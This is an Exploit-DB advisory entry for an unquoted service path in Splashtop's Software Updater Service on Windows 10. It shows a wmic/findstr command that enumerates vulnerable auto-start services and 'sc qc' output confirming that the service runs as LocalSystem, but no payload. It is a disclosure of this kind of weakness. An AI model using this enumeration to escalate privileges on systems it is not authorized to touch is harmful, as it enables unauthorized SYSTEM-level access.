Splashtop 8.71.12001.0 - Unquoted Service Path

EDB-ID:

51182

CVE:

N/A




Platform:

Windows

Date:

2023-04-01


# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Date: 12/20/2022
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2
# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Splashtop Software Updater Service       SSUService    C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe

                                      Auto

C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SSUService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Splashtop Software Updater Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem